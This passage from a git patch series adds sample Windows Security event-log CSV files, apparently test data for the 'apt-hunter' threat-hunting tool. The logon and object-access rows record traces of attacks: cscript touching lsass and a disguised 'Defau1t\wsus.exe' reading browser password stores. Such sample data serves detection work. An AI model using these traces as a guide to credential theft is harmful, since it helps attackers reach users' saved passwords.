+ + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-13T22:04:58.363696+04:00,1550081098.363696,4624,admin01,EXAMPLE,10,User32,127.0.0.1,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227762 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x14a321 + 10 + User32 + Negotiate + PC01 + AF83A89C-C68A-5397-5AC6-24A0C4D2BAF6 + - + - + 0 + 0x4b8 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 49274 + +" 
+2019-02-13T22:04:57.462400+04:00,1550081097.4624,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227747 + + + + + Security + PC01.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x148f5d + 3 + NtLmSsp + NTLM + PC02 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + +" +2019-02-13T22:04:45.905783+04:00,1550081085.905783,4624,admin01,EXAMPLE,3,NtLmSsp,-,PC02,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227740 + + + + + Security + PC01.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0x14871d + 3 + NtLmSsp + NTLM + PC02 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + +" +2019-02-13T22:02:05.418087+04:00,1550080925.418087,4624,user01,EXAMPLE,7,Negotiat,-,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227708 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x1414d9 + 7 + Negotiat + Negotiate + PC01 + 42DAF7A9-F185-F292-0EBD-B86A26624D31 + - + - + 0 + 0x208 + C:\Windows\System32\lsass.exe + - + - + +" +2019-02-13T22:02:04.436676+04:00,1550080924.436676,4624,user01,EXAMPLE,11,User32,127.0.0.1,PC01,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 227701 + + + + + Security + PC01.example.corp + + + + + S-1-5-18 + PC01$ + EXAMPLE + 0x3e7 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x1414c8 + 11 + User32 + Negotiate + PC01 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x704 + C:\Windows\System32\winlogon.exe + 127.0.0.1 + 0 + +" 
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:42:00.800072+04:00,1651380120.800072,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21373 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x82215a + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:54.272334+04:00,1651380114.272334,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21371 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821f28 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:47.653255+04:00,1651380107.653255,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21369 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + 
S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x821aab + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63652 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-05-01T08:41:37.642369+04:00,1651380097.642369,4624,Administrator,WINLAB.LOCAL,3,Kerberos,192.168.1.219,-,wind10.winlab.local,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 21367 + + + + + Security + wind10.winlab.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-81107902-1099128984-1836738286-500 + Administrator + WINLAB.LOCAL + 0x820d61 + 3 + Kerberos + Kerberos + - + 59CEFB69-4F9D-7486-C449-471E00B814E3 + - + - + 0 + 0x0 + - + 192.168.1.219 + 63640 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-11-15T12:19:17.134469+04:00,1573805957.134469,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,127.0.0.1,-,alice.insecurebank.local,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 25049 + + + + + Security + alice.insecurebank.local + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x1d12916 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 127.0.0.1 + 59336 + %%1833 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171296 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aadb8 + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62863 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.263194+04:00,1599047277.263194,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171295 + + + + + 
Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aad4a + 3 + Kerberos + Kerberos + - + 860D1189-6C67-C57B-59ED-C0676A052019 + - + - + 0 + 0x0 + - + ::1 + 62862 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171294 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aa47f + 3 + Kerberos + Kerberos + - + 27FCE179-F80F-F6A6-7DF4-C247E783B072 + - + - + 0 + 0x0 + - + ::1 + 62860 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171292 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c9a + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171291 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c80 + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60728 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171290 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +"
-- 2.34.1
From bb4797d25c59ad5d58e8c946fb8912d926c1746a Mon Sep 17 00:00:00 2001
From: pex7hfbnt <1584881064@qq.com>
Date: Wed, 16 Oct 2024 23:42:20 +0800
Subject: [PATCH 04/13] Update README.md
---
README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index caf4ef0..68c4643 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,3 @@
 # apt-hunter
-
+- When you upload the file path depth of 2 or more layers, please be sure to note that the file upload path '/' will be translated into the url '%2F' which will create a new folder! Be sure to pay attention!
+- 当你上传的文件路径深度在2层及以上时,请一定要注意文件上传路径'/' 会被url 翻译为 '%2F' 这样会新建一个文件夹!一定要注意!
\ No newline at end of file
-- 2.34.1
From 3fe803767b891a90343ea4ca326247f45430009e Mon Sep 17 00:00:00 2001
From: pex7hfbnt <1584881064@qq.com>
Date: Wed, 16 Oct 2024 23:43:35 +0800
Subject: [PATCH 05/13] ADD file via upload
---
.../samples/Sample_Object_Access_Events.csv | 14715 ++++++++++++++++
1 file changed, 14715 insertions(+)
create mode 100644 source/samples/Sample_Object_Access_Events.csv
diff --git a/source/samples/Sample_Object_Access_Events.csv b/source/samples/Sample_Object_Access_Events.csv
new file mode 100644
index 0000000..01dbd53
--- /dev/null
+++ b/source/samples/Sample_Object_Access_Events.csv
@@ -0,0 +1,14715 @@ +Date and Time,timestamp,Event ID,Account Name,Object Name,Object Type,Process Name,Computer Name,Channel,Original Event Log +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + 
S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" 
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + 
C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + 
+ + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login 
Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe 
+ +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" 